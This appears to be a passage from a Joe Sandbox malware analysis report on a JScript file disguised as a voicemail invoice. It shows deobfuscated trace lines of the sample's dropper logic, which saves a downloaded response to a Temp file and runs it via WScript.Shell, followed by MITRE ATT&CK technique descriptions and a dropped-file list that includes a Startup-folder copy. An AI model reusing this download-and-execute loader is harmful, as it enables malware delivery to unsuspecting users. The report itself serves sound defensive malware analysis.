575	var fmcBNX = ( _0x346f50 ( 0x1b4, 0x218, 0x22d, 0x27f ) + _0x346f50 ( 0x2b8, 0x28a, 0x2e2, 0x234 ) )[_0x346f50 ( 0x30a, 0x2c6, 0x2ae, 0x30b ) ] ( '\|' ), Hazryc = 0x1 * 0x19db + - 0x9d * 0x2 + - 0x18a1;	_0x346f50(436,536,557,639) ➔ "1\|4\|6\|0\|2\|" _0x346f50(696,650,738,564) ➔ "5\|3" _0x346f50(778,710,686,779) ➔ "split" "1\|4\|6\|0\|2\|5\|3".split("\|") ➔ 1,4,6,0,2,5,3
576	while (! ! [ ] )
577	{
578	switch ( fmcBNX[Hazryc ++] ) {
579	case '0' :
580	bStrm[_0x44b961 ( - 0xdc, - 0x17a, - 0x107, - 0x12f ) ] ( xHttp[_0x346f50 ( 0x294, 0x26b, 0x206, 0x232 ) + 'dy'] );	_0x44b961(-220,-378,-263,-303) ➔ "write" _0x346f50(660,619,518,562) ➔ "responseBo" write() ➔ undefined
581	continue ;
582	case '1' :
583	var bStrm = WScript[_0x44b961 ( - 0x10f, - 0x15b, - 0x12e, - 0x149 ) + 'ct'] ( _0x44b961 ( - 0x80, - 0xe1, - 0xf8, - 0xcd ) + 'am' );	_0x44b961(-271,-347,-302,-329) ➔ "CreateObje" _0x44b961(-128,-225,-248,-205) ➔ "Adodb.Stre" Windows Script Host.CreateObject("Adodb.Stream") ➔
584	continue ;
585	case '2' :
586	bStrm[_0x346f50 ( 0x246, 0x290, 0x251, 0x265 ) ] ( path, 0x1091 + - 0x1 * - 0xcfa + - 0x1 * 0x1d89 );	_0x346f50(582,656,593,613) ➔ "savetofile" savetofile("C:\Users\jones\AppData\Local\Temp\98575.js",2) ➔ undefined
587	continue ;
588	case '3' :
589	if ( path['endsWith'] ( _0x44b961 ( - 0x12a, - 0x146, - 0x114, - 0x107 ) ) )	_0x44b961(-298,-326,-276,-263) ➔ ".jar" "C:\Users\jones\AppData\Local\Temp\98575.js".endsWith(".jar") ➔ false
590	wshShell[_0x346f50 ( 0x1fe, 0x220, 0x23d, 0x207 ) ] ( _0x346f50 ( 0x2a5, 0x28b, 0x2e2, 0x234 ) + '\x22' + path + '\x22' );
591	else
592	path['endsWith'] ( _0x346f50 ( 0x32f, 0x2cd, 0x2e2, 0x2e0 ) ) \|\| path[_0x44b961 ( - 0xf5, - 0x117, - 0x13e, - 0x139 ) ] ( _0x44b961 ( - 0x19e, - 0x18b, - 0x136, - 0x150 ) ) ? wshShell['run'] ( _0x44b961 ( - 0x155, - 0x108, - 0xff, - 0x13d ) + path + '\x22' ) : wshShell[_0x346f50 ( 0x236, 0x220, 0x1c0, 0x1cf ) ] ( '\x22' + path + '\x22' );	_0x346f50(815,717,738,736) ➔ ".vbs" "C:\Users\jones\AppData\Local\Temp\98575.js".endsWith(".vbs") ➔ false _0x44b961(-245,-279,-318,-313) ➔ "endsWith" _0x44b961(-414,-395,-310,-336) ➔ ".wsf" "C:\Users\jones\AppData\Local\Temp\98575.js".endsWith(".wsf") ➔ false _0x346f50(566,544,448,463) ➔ "run" run(""C:\Users\jones\AppData\Local\Temp\98575.js"") ➔ 0
593	continue ;
594	case '4' :
595	bStrm[_0x44b961 ( - 0x125, - 0x144, - 0xda, - 0x120 ) ] = - 0xc2a * - 0x2 + 0x2 * 0x4b + 0x1 * - 0x18e9;	_0x44b961(-293,-324,-218,-288) ➔ "Type"
596	continue ;
597	case '5' :
598	bStrm[_0x44b961 ( - 0x114, - 0x109, - 0xbb, - 0xc7 ) ] ( );	_0x44b961(-276,-265,-187,-199) ➔ "close" close() ➔ undefined
599	continue ;
600	case '6' :
601	bStrm[_0x44b961 ( - 0x192, - 0x15a, - 0x17b, - 0x15c ) ] ( );	_0x44b961(-402,-346,-379,-348) ➔ "open" open() ➔ undefined
602	continue ;
603	}
604	break ;
605	}
606	}
607	else
608	WScript[_0x346f50 ( 0x25b, 0x278, 0x257, 0x2a4 ) ] ( 'Expired\x20li' + 'nk' );
609	continue ;
610	}
611	break ;
612	}
613	}
614	catch ( _0x1f5ad0 )
615	{
616	}
617	}

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New Voicemail Invoice 64746w .js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Z3ZFCENO.json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\NZWJFGKO.json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\R261FQTU.json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js

C:\Users\user\AppData\Local\Temp\98575.js

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js

Static File Info

General

File Icon

Windows Analysis Report
New Voicemail Invoice 64746w .js